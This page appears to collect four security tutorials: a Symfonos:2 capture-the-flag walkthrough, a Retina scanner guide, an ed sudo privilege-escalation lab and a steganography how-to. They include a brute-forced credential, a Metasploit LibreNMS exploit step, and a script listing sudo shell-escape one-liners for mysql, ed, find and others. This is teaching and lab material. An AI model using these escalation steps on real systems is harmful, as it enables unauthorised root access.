Symfonos:2 Vulnhub Walkthrough

Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

  1. Scanning
  • NMAP
  2. Enumeration
  • Enum4Linux
  3. Exploitation
  • Smbclient
  • Hydra
  • Msfconsole
  4. Privilege Escalation
  • Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start with the scanning process. The target VM took the IP address 192.168.1.102 automatically (via DHCP) from our local Wi-Fi network.

Then we used Nmap for port enumeration and found that ports 21, 22, 80, 139 and 445 are open.

Enumeration:

As port 80 is open, we opened the IP address in our browser but found nothing useful on the webpage. We also tried dirb and other directory brute-forcing tools without finding anything.

For further enumeration we used the Enum4Linux tool and found some useful information: a share named anonymous.

To confirm the finding we listed the target’s shares with smbclient using a null session (empty password) and got the same result.

Inside the anonymous share there is a directory named backups, which contains a log.txt file, so we downloaded it with the get command.

Opening log.txt on our local machine revealed a username: aeolus.

Exploitation:

So far we have a username, aeolus, so we brute-forced its password with hydra and, after a long wait, got the password sergiotaemo.

Now we have a username and a password, and we already know that an SSH service is running on the target. We logged in to the target over SSH from msfconsole and got a session.

The ifconfig output gave us a hint that the target machine may be running services bound to its loopback address only.

So we ran netstat to check which addresses and ports the target is listening on, and found a web service on port 8080 bound to localhost (127.0.0.1) only.

So we used SSH port forwarding through our aeolus session to reach port 8080 on the target.
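The check above (which listeners are reachable only from the box itself) and the forward that follows it can be automated. The script below is an added example, not part of the original walkthrough: it parses ss/netstat listener output, reports the ports bound only to loopback, and builds the matching ssh -L command. The listener table is constructed to resemble what the target showed; the user aeolus and the IP come from the walkthrough, the extra 3306 listener is illustrative.

```python
"""Find listeners bound only to loopback in `ss -lnt` / `netstat -lnt` output
and build the `ssh -L` local-forward command that reaches them.

Added example; the listener table below is constructed, not captured."""

LOOPBACK_PREFIXES = ("127.", "[::1]", "::1")

# Constructed sample modelled on `ss -lnt` output (not from the real VM).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     127.0.0.1:8080       0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
LISTEN  0       50      0.0.0.0:445          0.0.0.0:*
"""


def parse_listeners(output):
    """Yield (address, port) for every LISTEN line.

    Works for both `ss -lnt` (state in the first column) and `netstat -lnt`
    (state in the last column); in both the local socket is the 4th column
    as addr:port, with IPv6 addresses before the last colon."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 4 or "LISTEN" not in (fields[0], fields[-1]):
            continue
        addr, _, port = fields[3].rpartition(":")
        if port.isdigit():
            yield addr, int(port)


def is_loopback(addr):
    return addr.startswith(LOOPBACK_PREFIXES)


def loopback_only_ports(output):
    """Ports whose every bind is loopback. A port that is also bound on
    0.0.0.0 or [::] is reachable directly from the network and is skipped."""
    binds = {}
    for addr, port in parse_listeners(output):
        binds.setdefault(port, []).append(is_loopback(addr))
    return sorted(port for port, flags in binds.items() if all(flags))


def ssh_forward_command(user, host, ports, local_base=0):
    """Build `ssh -N -L local:127.0.0.1:remote ...` for every port.
    local_base offsets the local side (10000 -> 18080) to avoid clashes
    with services already running on the attacking machine."""
    forwards = " ".join(f"-L {local_base + p}:127.0.0.1:{p}" for p in ports)
    return f"ssh -N {forwards} {user}@{host}"


if __name__ == "__main__":
    ports = loopback_only_ports(SAMPLE_SS_OUTPUT)
    print("loopback-only ports:", ports)
    print(ssh_forward_command("aeolus", "192.168.1.102", ports))
```

After running the printed command in one terminal, the LibreNMS instance is reachable from the attacking machine at http://127.0.0.1:8080 (or at the offset port if local_base was set); -N keeps the connection open without opening a remote shell.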

After that we could access the web service on port 8080, which turned out to be a LibreNMS web application.

We searched Metasploit for exploits against LibreNMS and found a command injection exploit module.

Using this exploit we got a meterpreter session as the librenms user.

Privilege Escalation:

To get a root shell we checked the sudo permissions of the librenms user and found that it can run the mysql command as root without a password. We leveraged this by using mysql’s shell escape (\!) to run /bin/sh, which gave us a root shell.

Once we had the root shell we moved to the /root directory and read the proof.txt file to complete the challenge.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

Retina: A Network Scanning Tool

In this article we will learn how to use Retina, a vulnerability scanner, to our best advantage. There are various network vulnerability scanners; Retina is one of the industry’s most powerful and effective. It provides a full vulnerability assessment workflow and generates a detailed network vulnerability report.

Table of content

  • Introduction to Retina
  • Scanning process
  • Working of Retina
  • Network scanning with retina
  • Conclusion

Introduction to Retina

Retina network scanner can scan multiple platforms. It also offers automated fixes and the ability to create your own audits. It covers the critical vulnerability classes, helping you secure your network properly. Because it updates its vulnerability database at the beginning of every session, it is reasonably reliable. Retina can scan in parallel, using its queuing system to scan up to 256 targets at the same time. Most scans can be run without administrative rights. Custom audit scans let you enforce your internal security policies. Retina Network Security Scanner is designed to discover, profile and assess all assets deployed on an organisation’s network; with it, customers can efficiently identify, prioritise and remediate vulnerabilities such as missing patches and configuration weaknesses.

Scanning Process

A scan begins when you give Retina the scan details through its GUI. As soon as the scanner receives them, it starts the audit process, which covers the following:

  • Targeting: builds a scan list from the address group and discovery options
  • Port scanning: finds all open, closed and filtered ports
  • OS detection: identifies the operating system running on the target
  • Auditing: assesses the vulnerabilities of each open port and its service.

Working of Retina

First, Retina retrieves the list of IPs that need to be scanned, then builds its target list and writes it to the eeye_groups table. The worklist holds the job’s start and stop data. Retina then starts running the scan. As targets are scanned, the completed entries are removed from the queue file; this ensures the scan will complete even if the scanner is shut down for any reason. At the end of the scan, the scanner writes Completed to the eeye_groups table in the scan results database (RTD). If the user aborts the job, the scanner writes Aborted to that table instead.

Network scanning with Retina

We downloaded the Retina Vulnerability Scanner from the official site. After downloading the version matching our machine, we installed it through the setup, which is straightforward. After installation we ran the application, which presents three tabs: “Audit”, “Remediate” and “Report”. First we work in the Audit tab, where we selected “Single-use” and then an individual target in Target Type, using the target’s IP address. With “Multiple-use”, a specific IP range can be given instead.

After selecting the target, we select the ports to scan; the options include All Ports, Common Ports, Discovery Ports and others. In our scenario we selected “All ports”.

After selecting the ports, it is time to select the type of audit to perform on the target. There are many audit types, and an option to modify them lets us craft a personalised audit from the options provided. We selected “All Audits”. This takes more time; a narrower, personalised audit finishes faster.

Next come the Options, where we can choose additional functionality to include in the scan: OS Detection, Reverse DNS, NetBIOS Name, MAC Address and others. We can also set the number of users to enumerate.

Now we run the scanner by clicking the “Scan” button. The scan starts and its details appear in the Active tab of the Scan Jobs section. Here we can see the server name “Metasploitable” and the operating system “Ubuntu 8.04”, along with other details of the scan.

Now we move to the “Remediate” tab. In its Configuration section we can see the vulnerabilities that were found, and we can sort them by name, category or other criteria. For multiple devices, we can also generate a report sorted by individual IP address.

Next is the “Report” tab. Here we can select further options to refine the report, with sections such as Scan Summary, Vulnerabilities by Category, Top Vulnerabilities and Top Open Ports. We can also choose the report type; in the image below we chose “Executive Report”.

As the image shows, the Report Type list offers many choices, such as Summary Report, Vulnerability Export Report, Access Report and Dashboard Report. This flexibility is one of the features that gives Retina an edge among vulnerability scanners.

In our practical we chose the “Executive” report type, as it is the one most commonly used in the IT industry. As the image shows, the report covers the major sections: scan summary, top vulnerabilities, open ports and the other important information.

Once the report is generated, you can open it in the browser as shown below. It records the date and time of the scan and of the report.

Everything in the report is catalogued for convenience, with section titles shown in the index. It starts with the top vulnerabilities and works down to the bottom ones.

First in the report is “Scan Metrics”, a brief overview of the scan. It tells you how many vulnerabilities are exploitable, rates them from low to high, and shows the time taken with exact start and end times.

Further on, it categorises all the vulnerabilities with their basic information, as shown in the image below:

Then it shows the top 20 vulnerabilities with their name, risk rating and description, along with their count.

Then it shows the bottom 20 vulnerabilities with their names and other information.

Then, as catalogued, it lists the top twenty open ports with name, port number and service. The count column gives the total number of open ports running the same service.

Finally it reports the operating system of the target machine, which is important information, as it helps you formulate an attack or a security policy.

Conclusion

Since Retina’s launch in 1998, BeyondTrust states that it has sold over 10,000 copies of the scanner. Retina has an edge over other scanners because it is continuously monitored and improved in step with the enterprise security posture. It is a sophisticated vulnerability assessment solution, available as a standalone application, a host-based option, or as part of the Retina CS enterprise vulnerability management solution, and it enables you to efficiently identify IT exposures and prioritise remediation enterprise-wide.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

Linux for Pentester: ed Privilege Escalation

In this article we introduce ed, a line-oriented text editor used to create, display, alter and manipulate text files. All ed commands operate on whole lines or ranges of lines; e.g. the “d” command deletes lines, the “m” command moves lines, the “t” command copies lines, and so on. We will then see how these features of ed can be used for privilege escalation.

Table of Content

Overview of ed

  • Summary of ed
  • Primary actions attained using ed

Abusing ed

  • Sudo lab setup for privilege escalation
  • Exploiting sudo rights

Summary of ed

The ed command in Linux starts the “ed text editor”, a line-based text editor. Its minimal interface makes it simple to work on text files: it lets the user create, edit, display and manipulate files.

Editing is done in two distinct modes, “command” and “input”. In command mode ed reads commands from standard input and executes them to manipulate the contents of the editor buffer; line-oriented commands such as ‘m’ (move), ‘d’ (delete) and ‘t’ (copy) stay in this mode. When an input command such as ‘a’ (append), ‘i’ (insert) or ‘c’ (change) is given, ed enters input mode and reads the text to be inserted until it sees a line containing only a period (.).

It is the oldest Unix editor, developed in 1969, and was succeeded by the vi and emacs text editors.

Now run ed’s help option to learn more about it.

Fundamental activities achieved by “ed”: ed performs many operations, so we will go through its functionality one by one.

Starting ed: Initially, the terminal looks like the image below when the command is run. By default the editor starts with an empty buffer to write into, much like any other command-line editor invoked without a file name.

Now we will create a text file containing some text. To do so, we first type ‘a’ (append) before entering anything, and once we finish writing we enter a single period (.) on a line of its own to tell the editor we are done.

Note: The main thing to remember is that ‘a’ enters input mode and ‘.’ on a line by itself leaves it. To save the buffer to a file, use ‘w’ followed by a file name of your choice; ed writes the file and displays the number of bytes written. Then ‘q’ quits the editor.

To confirm that the file was created, check it with the “cat” command.

Editing the file with ed: If you need to edit the same file again, pass its name as an argument to the ed command and follow the same procedure as above.

In the image below I’m adding one more line to the file “info.txt” that I created above, following the same process.

Note: The ‘a’, ‘.’, ‘w’ and ‘q’ commands are needed every time we add text with ed, whichever option it was started with.

Changing a specific line: So far we have covered basic editing; now let’s look at further editing aspects, for example how to change a specific line using ed.

The image below shows how to print a particular line using the ‘p’ and ‘n’ commands.

Typing ‘p’ prints the current line (the line the editor is positioned at), while ‘n’ prints it together with its line number.

After typing ‘n’ we only need to give the number of the line we want to alter. When a file is loaded, the current line is its last line, so ‘n’ displays the last line by default; after that you can type the line number you are looking for.

Once you are at the line you want to change, enter ‘c’ to replace that line by typing the new text (ending with ‘.’). For example, I changed the 5th line, the last line of my file, adding more detail to it. I saved the file with the same ‘w’ and ‘q’ process and re-read it with the ‘cat’ command to check the modification.

Error messages in ed: When you type something ed can’t understand, it displays a question mark (?) by default. To find out what went wrong, ed provides a very helpful command, ‘h’.

As the screenshot shows, when I used the ‘b’ command it returned (?), the error symbol, and typing ‘h’ made ed display the error message: unknown command.

Copy and move operations in ed: Apart from the functions discussed above, ed can also copy a line to another location or move it; ‘t’ copies a line and ‘m’ moves one. Precede ‘t’ with the number of the line to copy and follow it with the destination line number. For example, in the image below I copied the 5th line to position 0 (the command 5t0) and saved the changes.

In this command, 5 is the line to copy and 0 is the line after which the copy is placed, so it becomes the first line of the file.

Note: Use ‘m’ instead of ‘t’ to move the line to another place rather than copy it.

Searching with ed: Searching for a line by keyword is easy in ed. First start ed with the “-p%” option, which sets % as the command prompt so you can see when ed is waiting for a command. Then, to search forward, type / followed by the keyword and press Enter; the editor prints the first line containing the keyword. Run the same command again to continue searching.

In the image below, ed printed only those lines containing the search keywords, i.e. misconfiguration and Linux.

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we will perform privilege escalation with ed. To do so we set up a lab in which ed can be run with administrative rights. Then we check what ed can do once it has sudo rights and how we can use that for privilege escalation.

As the image below shows, I created a local user (test) who has sudo rights to run ed as root.

To grant the sudo right, open the /etc/sudoers file (with visudo) and add the following entry under the user privilege specification section.

Exploiting Sudo rights

Now we will exploit ed by taking advantage of its sudo permission. For this we need a session on the victim’s machine that gives us local user access to the targeted system, from which we can escalate to root.

First we connect to the target machine with SSH; type the following command to log in as the local user.

Then we check the sudo rights of the “test” user (sudo -l) and find that “test” can execute the ed command as root without a password.

Knowing that the test user has this sudo right, we can start ed with sudo (an empty buffer is enough) and use its ‘!’ shell escape to call /bin/bash or /bin/sh; because ed is running as root, so is the shell.
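Both the mysql rule in the Symfonos:2 walkthrough above and the ed rule in this lab are the same class of misconfiguration: a sudo rule for a binary that can spawn a shell from inside itself. The script below is an added example, not taken from either article; it parses the text that sudo -l prints, and for each allowed binary with a known shell escape reports how the escape is invoked. The sudo -l listing is constructed to contain both cases plus a harmless /usr/bin/id rule; the host names are illustrative, and the escape recipes are the standard ones for each program.

```python
"""Audit `sudo -l` output for rules that amount to a root shell.

Added example; the `sudo -l` text below is constructed, not captured."""

import re

# Programs that can run a shell from inside themselves, mapped to the standard
# way of doing so once the program is started under sudo.
SHELL_ESCAPES = {
    "mysql":   "sudo mysql -e '\\! /bin/sh'",
    "ed":      "sudo ed  then type:  !/bin/sh",
    "vi":      "sudo vi  then type:  :!/bin/sh",
    "vim":     "sudo vim  then type:  :!/bin/sh",
    "less":    "sudo less /etc/profile  then type:  !/bin/sh",
    "man":     "sudo man man  then type:  !/bin/sh",
    "awk":     "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "find":    "sudo find . -exec /bin/sh \\; -quit",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# Constructed listing in the format `sudo -l` uses (hosts are illustrative).
SAMPLE_SUDO_L = """\
Matching Defaults entries for librenms on symfonos2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User librenms may run the following commands on symfonos2:
    (ALL : ALL) NOPASSWD: /usr/bin/mysql
    (root) NOPASSWD: /bin/ed
    (root) /usr/bin/id
"""

# "(runas) TAG: TAG: cmd, cmd" -- tags such as NOPASSWD: or SETENV: are optional.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output.

    Only the block after "may run the following commands" is read; each
    rule line starts with the run-as spec in parentheses."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.startswith("("):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def audit_sudo_l(text):
    """Return [(command, runas, nopasswd, escape)] for every rule that gives
    a shell: an explicit ALL, or a binary listed in SHELL_ESCAPES."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary == "ALL":
            findings.append((cmd, runas, nopasswd, "sudo /bin/sh"))
        elif binary in SHELL_ESCAPES:
            findings.append((cmd, runas, nopasswd, SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for cmd, runas, nopasswd, escape in audit_sudo_l(SAMPLE_SUDO_L):
        auth = "no password" if nopasswd else "password required"
        print(f"{cmd:<18} as ({runas}), {auth}: {escape}")
```

Run the same check from the defender's side: the fix is not to remove NOPASSWD but to stop granting sudo on interactive programs at all, since the shell escape works just as well when a password is required.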

Conclusion: We have successfully exploited “ed” by abusing its functionality after it was granted higher privileges.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Steganography: The Art of Concealing

In this post we introduce multiple ways of hiding text using audio, image, video and white-space text as carriers. To achieve this we use the technique known as “steganography”: hiding secret data within an ordinary, non-secret file or message in order to avoid detection. We will look at each of the methods that let us do this.

Table of Content

Introduction

Purpose of steganography

Methods of steganography

  • Audio-based steganography
  • Image-based steganography
  • Video-based steganography
  • White text Steganography

Introduction

Steganography is the practice of hiding a file, message, image or video inside another file, such as a message, video or audio file. The hidden message is disguised as something else: a picture, an article, sometimes a shopping list. Whereas encryption protects only the content of a message, steganography conceals both the existence and the content of the secret message. Here we look at data concealed in computer files. Let’s understand this better with examples, starting with the purpose of steganography.

Purpose of Steganography

Steganography is a form of discreet communication. You can encrypt a private file and hide it inside a picture or another file type before sending it to someone, which reduces the likelihood of it being intercepted. If you send an encrypted file, whoever intercepts it knows there is something to decrypt and may try many ways to do so; with steganography the file looks like a normal image and the interceptor has no hint that anything lies behind it. So it is a safer way of communicating for organisations that want to protect themselves from such attacks. Note that steganography hides only the existence of the message: if the carrier is analysed and the payload found, its confidentiality still rests on encryption, which is why the tools below let you add a password.

So, let’s start and see how it works.

Audio Steganography

First we install a program called DeepSound, which hides files inside audio files. For installation, visit the link given below.

https://deepsound.en.uptodown.com/windows

Conceal Approach: Open the application, click “Open carrier files” and select the mp3 file behind which you want to conceal the original file.

Here we selected an audio file behind which we will hide the data.

After selecting the carrier, click “Add secret files” and choose the file you want to conceal. Here we chose a document file.

You can add an extra layer of security by protecting the hidden data with a password. As you can see, we set 123 as the password (a trivially weak one, used only for this demonstration); without it the other person cannot extract the file.

The file is created successfully.

Now we can share this mp3 file with the other person to carry on the hidden communication over the network.

Reveal Approach: The recipient opens the mp3 in DeepSound and enters the same password we set when hiding the file. Once the password is entered, the concealed content becomes visible and can be retrieved by clicking “Extract files”; the doc file is extracted successfully. So with this tool we have concealed our doc file behind an mp3 file.

Image Steganography

Let’s now hide a file behind an image. For this we installed the next tool, OpenStego.

Conceal Approach: First select the doc file to hide, then the image file behind which it will be concealed, then choose a password; the stego file is created.

Reveal Approach: To extract the doc file, supply the stego image and the correct password, and the doc file is recovered.

Video Steganography

Now let’s see how to hide anything behind a video file. For this we install the tool OurSecret from the link given here.

https://oursecret.soft112.com/

Once it is downloaded, we will conceal a doc file behind a video file.

Let’s start.

Hide: First select the video we want to send: click “Select a carrier file” and choose the video, then choose the file to hide, give it a password and click “Hide”; the new file is created.

Unhide: Open the new file with the same tool to unhide it; it asks for the password, and once it is entered we get the concealed file back.

Text Steganography

Now we move to a different idea: white-space (text) steganography, hiding text within text in a way that is hard for anyone to notice. For this we visit the website

www.spammimic.com

Conceal Approach: Click “Encode”, enter the text you want to hide and click “Encode” again.

Once you click Encode, a new encoded text is produced.

Reveal Approach: To decode the encoded text, copy it, paste it into the box provided and click “Decode”.

And finally you get the message that was hidden behind it.
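To show what the image section (OpenStego) and this white-space section actually do under the hood, here is an added example that is not code from either tool: a least-significant-bit codec over a raw 8-bit pixel buffer, and a trailing-whitespace codec over lines of cover text, sharing one bit-packing helper. The pixel buffer and cover text are constructed; with a real image you would first decode it to a byte array with an imaging library and write the modified bytes back losslessly (PNG, not JPEG).

```python
"""Minimal LSB image and trailing-whitespace text steganography.

Added example; carriers below are constructed, not real files."""


def _to_bits(data):
    """Big-endian bit list for a byte string."""
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]


def _from_bits(bits):
    out = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def _frame(payload):
    """Length-prefixed payload so the extractor knows where to stop."""
    return len(payload).to_bytes(4, "big") + payload


# --- LSB image steganography ---------------------------------------------

def lsb_hide(pixels, payload):
    """Store each payload bit in the least-significant bit of successive
    pixel bytes. A channel value changes by at most 1, invisible to the eye
    but easy to spot statistically (e.g. with a chi-square LSB test)."""
    bits = _to_bits(_frame(payload))
    if len(bits) > len(pixels):
        raise ValueError("payload too large for carrier")
    stego = bytearray(pixels)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)


def lsb_reveal(pixels):
    length = int.from_bytes(_from_bits([p & 1 for p in pixels[:32]]), "big")
    return _from_bits([p & 1 for p in pixels[32:32 + length * 8]])


# --- white-space text steganography --------------------------------------

def ws_hide(cover_lines, payload):
    """Append a trailing space (bit 0) or tab (bit 1) to successive lines of
    cover text; editors and browsers render both as nothing."""
    bits = _to_bits(_frame(payload))
    if len(bits) > len(cover_lines):
        raise ValueError("not enough cover lines for payload")
    out = list(cover_lines)
    for i, bit in enumerate(bits):
        out[i] = out[i].rstrip(" \t") + ("\t" if bit else " ")
    return out


def ws_reveal(lines):
    bits = []
    for line in lines:
        if line.endswith("\t"):
            bits.append(1)
        elif line.endswith(" "):
            bits.append(0)
        else:
            break
    length = int.from_bytes(_from_bits(bits[:32]), "big")
    return _from_bits(bits[32:32 + length * 8])


# Constructed carriers: a fake 1024-byte greyscale buffer and 160 cover lines.
PIXELS = bytes(range(256)) * 4
COVER = [f"line {i} of the cover text" for i in range(160)]

if __name__ == "__main__":
    stego = lsb_hide(PIXELS, b"meet at dawn")
    print("image:", lsb_reveal(stego))
    print("text: ", ws_reveal(ws_hide(COVER, b"secret")))
```

Neither codec encrypts anything: a carrier that is found by a detector gives the message up immediately, so real use encrypts the payload first, which is what the password option in the GUI tools above is for. The trailing-whitespace variant also does not survive editors or transports that strip trailing spaces.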

Another Method

Conceal Approach: That’s not all! We can also send the message as a spreadsheet, which is hard for anyone to detect. To use this feature, click “Encode as a spreadsheet”, enter the text you want to conceal and click “Encode”.

This generates a new spreadsheet file with our “secret message” concealed in its records.

When opened, the spreadsheet looks perfectly normal, so nobody would suspect the real message behind it.

Reveal: Since we know there is a hidden message behind it, we decode it: first click “Decode fake spreadsheet”.

Now paste the sheet we want to decode into the box and click “Decode”.

Now you get the real hidden message that was behind the spreadsheet.

So it is clear that there are several ways of sending secret messages through the art of steganography.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here